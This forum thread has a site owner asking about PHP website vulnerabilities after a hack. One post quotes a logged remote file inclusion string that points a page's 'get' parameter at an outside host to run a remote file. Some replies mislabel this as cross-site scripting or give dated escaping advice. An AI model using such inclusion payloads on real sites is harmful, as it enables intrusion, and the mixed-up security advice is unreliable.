Website Vulnerabilities

[TwinkleTits]

The only vulnerability I know of is not filtering input fields which makes your site prone to cross site scripting. My site got hacked last year by some Brazilians then some weird shit happened I got an email from a Brazilian guy telling me that hackers were using my site to send spam and somehow he managed to edit my PHP files and he patched up the vulnerabilities but adding the htmlelements command to all the input fields. How the hell did he edit the PHP files? He woulda had to either have the FTP username and password or control panel username and pass and either way I dunno how the hell he managed to get that info.

What are other things to take into consideration when hosting a website? I spotted that people were messing with the URL variables for example my website has pages like ?get=drugs which tells the index.php to include drugs.php. I checked the logs and people were typing in stuff like ?get=http://www.suspicioussite/suspiciousfile.txt. Obviously they were trying to get my site to run these malicious text files. Is that considered cross site scripting too?

In fact my log files were packed full of weird shit that people were doing half of it I didn't understand at all.

[crimsonsmoke]

Sorry, I don't have any of the answers to your question, but I'd just like to say you have a fantastic name.

[bornkiller]

Quote:

Originally Posted by crimsonsmoke

Sorry, I don't have any of the answers to your question, but I'd just like to say you have a fantastic name.

Yep! I can agree with this this also....brilliant user name

[TwinkleTits]

Quote:

Originally Posted by crimsonsmoke

Sorry, I don't have any of the answers to your question, but I'd just like to say you have a fantastic name.

Thanks. Its quite elegant isn't it. I got it off one of those fat-pie cartoons. http://www.fat-pie.com/twinkletits.htm He has some imagination that David Firth lad. I wonder if hes on acid or shrooms when he comes up with those cartoons.

[5024L]

You should have posted in NS&H, you probably would have got a better answer.

[crimsonsmoke]

Quote:

Originally Posted by TwinkleTits

Thanks. Its quite elegant isn't it. I got it off one of those fat-pie cartoons. http://www.fat-pie.com/twinkletits.htm He has some imagination that David Firth lad. I wonder if hes on acid or shrooms when he comes up with those cartoons.

Yeah, I know Fat[dash]Pie. Devvo's fucking brilliant too .

Crazy northan bastard.

[Axiom]

Two of the simplest things you can do to avoid hackers.

1) Any data going in wrap in mysql_real_escape_string()
2) Any data going out wrap in htmlentities()

Also, turn off MySQL warnings and avoid including files based on GET variables. It just encourages the hacker to look for XSS...

[deus]

Oh man, I could write an absolute novel on this

Post reserved to remind me in the morning when I can fathom a sentence.